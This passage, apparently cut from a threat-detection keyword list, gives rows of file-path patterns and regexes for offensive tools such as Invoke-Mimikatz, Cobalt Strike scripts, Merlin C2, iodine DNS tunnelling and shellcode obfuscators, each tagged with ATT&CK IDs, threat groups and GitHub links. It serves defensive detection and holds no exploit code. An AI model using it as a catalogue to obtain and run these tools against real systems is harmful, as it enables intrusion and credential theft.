Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-Bof/*",".{0,1000}\/Invoke\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*/Invoke-CleverSpray.git*",".{0,1000}\/Invoke\-CleverSpray\.git.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*/Invoke-DCOM.ps1*",".{0,1000}\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\/Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-ExcelMacroPivot.ps1*",".{0,1000}\/Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-HostEnum.ps1*",".{0,1000}\/Invoke\-HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/Invoke-InternalMonologue.ps1*",".{0,1000}\/Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-Mimikatz.ps1*",".{0,1000}\/Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-PowerThIEf.ps1*",".{0,1000}\/Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-RunAs.ps1*",".{0,1000}\/Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Invoke-SMBRemoting.git*",".{0,1000}\/Invoke\-SMBRemoting\.git.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*/Invoke-Stealth.git*",".{0,1000}\/Invoke\-Stealth\.git.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/invoke-stealth.php*",".{0,1000}\/invoke\-stealth\.php.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/Invoke-Stealth.ps1*",".{0,1000}\/Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/Invoke-WMILM.ps1*",".{0,1000}\/Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/iodine-*-windows.zip*",".{0,1000}\/iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/iodine.exe*",".{0,1000}\/iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/iodine.git*",".{0,1000}\/iodine\.git.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/iodine-master/*",".{0,1000}\/iodine\-master\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/io-tl/Mara*",".{0,1000}\/io\-tl\/Mara.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "*/IOXIDResolver.py*",".{0,1000}\/IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ip_spoof.rb*",".{0,1000}\/ip_spoof\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/IPayloadService.*",".{0,1000}\/IPayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/ip-forwarding.nse*",".{0,1000}\/ip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/IPfuscation.cpp*",".{0,1000}\/IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/IPfuscation.exe*",".{0,1000}\/IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/ip-geolocation-geoplugin.nse*",".{0,1000}\/ip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-ipinfodb.nse*",".{0,1000}\/ip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-bing.nse*",".{0,1000}\/ip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-google.nse*",".{0,1000}\/ip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-kml.nse*",".{0,1000}\/ip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-maxmind.nse*",".{0,1000}\/ip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-https-discover.nse*",".{0,1000}\/ip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipidseq.nse*",".{0,1000}\/ipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi_passwords.txt*",".{0,1000}\/ipmi_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ipmi-brute.nse*",".{0,1000}\/ipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-cipher-zero.nse*",".{0,1000}\/ipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-version.nse*",".{0,1000}\/ipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipv6-multicast-mld-list.nse*",".{0,1000}\/ipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipv6-node-info.nse*",".{0,1000}\/ipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipv6-ra-flood.nse*",".{0,1000}\/ipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-botnet-channels.nse*",".{0,1000}\/irc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-brute.nse*",".{0,1000}\/irc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-info.nse*",".{0,1000}\/irc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-sasl-brute.nse*",".{0,1000}\/irc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-unrealircd-backdoor.nse*",".{0,1000}\/irc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irs.exe*",".{0,1000}\/irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*/iscsi-brute.nse*",".{0,1000}\/iscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iscsi-info.nse*",".{0,1000}\/iscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/isns-info.nse*",".{0,1000}\/isns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/itsdangerous.zip*",".{0,1000}\/itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/ItWasAllADream.git*",".{0,1000}\/ItWasAllADream\.git.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*/Ivy/Cryptor*",".{0,1000}\/Ivy\/Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*/Ivy/Loader/*",".{0,1000}\/Ivy\/Loader\/.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*/jackit*",".{0,1000}\/jackit.{0,1000}","offensive_tool_keyword","jackit","Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the 